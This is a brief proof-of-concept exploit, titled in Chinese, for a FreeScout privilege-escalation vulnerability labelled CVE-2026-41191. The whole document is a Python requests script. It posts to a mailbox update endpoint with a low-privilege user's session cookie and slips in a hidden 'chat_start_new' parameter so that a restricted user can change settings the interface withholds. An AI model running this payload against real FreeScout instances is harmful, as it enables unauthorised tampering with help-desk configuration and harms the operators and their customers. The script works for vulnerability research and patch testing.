CVE-2026-41191 FreeScout权限提升漏洞

import requests # Target URL (Example) target_url = "https://example.com/mailboxes/1/update-save" # Attacker's session cookie (User with 'sig' permission) cookies = { "freescout_session": "attacker_session_cookie_here" } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } # Vulnerable payload: Injecting hidden parameter # 'chat_start_new' controls chat settings and is not exposed to low-priv users in UI payload = { "name": "Support Mailbox", "email": "[email protected]", "signature": "<p>Authorized Signature</p>", "chat_start_new": "1" # Malicious parameter injection } response = requests.post(target_url, data=payload, cookies=cookies, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Hidden settings potentially updated.") else: print(f"[-] Failed. Status code: {response.status_code}")